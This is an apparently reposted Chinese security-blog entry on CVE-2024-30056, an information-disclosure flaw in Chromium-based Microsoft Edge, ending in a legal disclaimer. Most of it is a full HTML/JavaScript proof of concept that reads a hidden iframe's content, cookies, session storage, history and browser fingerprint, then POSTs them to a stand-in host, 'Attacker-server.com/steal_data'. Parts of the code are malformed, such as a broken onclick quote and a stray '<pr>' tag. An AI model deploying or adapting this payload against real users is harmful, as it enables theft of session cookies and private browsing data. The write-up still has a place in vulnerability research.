CVE-2024-30056 是一个关于 Microsoft Edge (Chromium-based) 的信息泄露漏洞。这个漏洞的重要性被评为 Important,最高安全性危险等级为 7.1,属于需要网络攻击向量、低攻击复杂性、无需特权、需要用户交互的漏洞。
用户需要点击一个特制的 URL 才能受到攻击者的威胁。成功利用该漏洞可能会导致一定程度的机密性丧失,即攻击者可以获取与受影响的 URL 相关的浏览器中的有限信息。此外,漏洞还可能导致一定程度的完整性丧失,攻击者可以修改有漏洞的链接的内容,将受害者重定向到恶意网站。
POC:
<html><head><title>PoC CVE-2024-30056</title><style>body {font-family: Arial, sans-serif;margin: 20px;}h1 {color: #333;}pre {background-color: #f5f5f5;padding: 10px;border: 1px solid #ddd;overflow: auto;}button {padding: 10px 20px;background-color: #007bff;color: #fff;border: none;border-radius: 5px;cursor: pointer;}button:hover {background-color: #0056b3;}</style></head><body><h1> Poc CVE-2024-30056</h1><iframe id="targetIframe" src="http://localhost/sensitive_page.html" style="display:none;"></iframe><script>document.getElementById('targetIframe').onload = function() {try {let iframeDocument = document.getElementById('targetIframe').contentWindow.document;let sensitiveData = btoa(encodeURIComponent(escape(iframeDocument.documentElement.innerHTML)));let cookies = btoa(encodeURIComponent(escape(document.cookie)));let sessions = btoa(encodeURIComponent(escape(JSON.stringify(sessionStorage))));let browsingHistory = btoa(encodeURIComponent(escape(JSON.stringify(history))));let browserData = {userAgent: navigator.userAgent,platform: navigator.platform,language: navigator.language,plugins: [],mimeTypes: [],screen: {width: window.screen.width,height: window.screen.height,colorDepth: window.screen.colorDepth},timezoneOffset: new Date().getTimezoneOffset()};for (let i = 0; i < navigator.plugins.length; i++) {browserData.plugins.push({name: navigator.plugins[i].name,filename: navigator.plugins[i].filename,description: navigator.plugins[i].description});}for (let i = 0; i < navigator.mimeTypes.length; i++) {browserData.mimeTypes.push({type: navigator.mimeTypes[i].type,description: navigator.mimeTypes[i].description,suffixes: navigator.mimeTypes[i].suffixes});}let popup = window.open("", "Sensitive Data", "width=600,height=600");popup.document.write("<h1>Sensitive Data</h1>");popup.document.write("<pr>" + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(sensitiveData)))) + "</pr>"));popup.document.write("<h2>Cookies:</h2>");popup.document.write("<pre>" + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(cookies)))) + "</pre>"));popup.document.write("<h2>User Sessions:</h2>");popup.document.write("<pre>" + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(sessions)))) + "</pre>"));popup.document.write("<h2>Browsing History:</h2>");popup.document.write("<pre>" + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(browsingHistory)))) + "</pre>"));popup.document.write("<h2>Browser Information:</h2>");popup.document.write("<pre>" + JSON.stringify(browserData, null, 2) + "</pre>");popup.document.write("<button onclick="sendData()">Send Data </button>");function sendData() {let xhr = new XMLHttpRequest();xhr.open("POST", "http://Attacker-server.com/steal_data", true);xhr.setRequestHeader("Content-Type", "application/json");xhr.send(JSON.stringify({ sensitiveData: sensitiveData, cookies: cookies, sessions: sessions, browsingHistory: browsingHistory }));alert("Stolen data has been sent to the malicious server!");}} catch (error) {console.error('Error accessing iframe content:', error);}};</script></body></html>
https://github.com/absholi7ly/Microsoft-Edge-Information-Disclosure原文始发于微信公众号(Ots安全):CVE-2024-30056 Microsoft Edge(基于 Chromium)信息泄露漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论